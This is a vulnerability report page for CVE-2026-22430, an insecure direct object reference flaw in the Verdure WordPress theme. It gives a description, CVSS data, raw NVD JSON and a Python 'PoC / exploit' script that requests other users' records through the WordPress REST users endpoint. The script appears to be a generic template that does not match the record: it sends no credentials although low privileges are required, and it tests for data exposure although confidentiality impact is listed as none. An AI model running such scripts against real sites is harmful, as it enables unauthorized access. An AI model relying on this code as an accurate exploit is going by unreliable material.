Security Vulnerability Report
中文
CVE-2026-22430 CVSS 5.4 MEDIUM

CVE-2026-22430

Published: 2026-01-22 17:16:34
Last Modified: 2026-04-28 19:36:37

Description

Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Verdure verdure allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Verdure: from n/a through <= 1.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Verdure主题 <= 1.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22430 PoC - Verdure Theme IDOR Vulnerability import requests import argparse def exploit_idor(target_url, target_id, victim_id): """ Exploit IDOR vulnerability in Verdure theme Replace OBJECT_ID with the target object's ID """ # Normal request to access own object normal_url = f"{target_url}/wp-json/wp/v2/users/{target_id}" # Malicious request to access victim's object by manipulating ID exploit_url = f"{target_url}/wp-json/wp/v2/users/{victim_id}" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } print(f"[*] Sending normal request: {normal_url}") normal_response = requests.get(normal_url, headers=headers) print(f"[+] Normal response status: {normal_response.status_code}") print(f"[*] Sending exploit request: {exploit_url}") exploit_response = requests.get(exploit_url, headers=headers) print(f"[+] Exploit response status: {exploit_response.status_code}") if exploit_response.status_code == 200 and exploit_response.text != normal_response.text: print("[!] IDOR vulnerability confirmed - unauthorized access possible") print(f"[+] Exposed data: {exploit_response.text[:500]}") return True else: print("[-] Vulnerability not confirmed or already patched") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2026-22430 PoC') parser.add_argument('--url', required=True, help='Target WordPress site URL') parser.add_argument('--my-id', type=int, default=1, help='Your user ID') parser.add_argument('--victim-id', type=int, default=2, help='Target victim ID') args = parser.parse_args() exploit_idor(args.url, args.my_id, args.victim_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22430", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:34.270", "lastModified": "2026-04-28T19:36:36.980", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Verdure verdure allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Verdure: from n/a through <= 1.6."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autorización a través de clave controlada por el usuario en Mikado-Themes Verdure verdure permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Verdure: desde n/a hasta &lt;= 1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/verdure/vulnerability/wordpress-verdure-theme-1-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}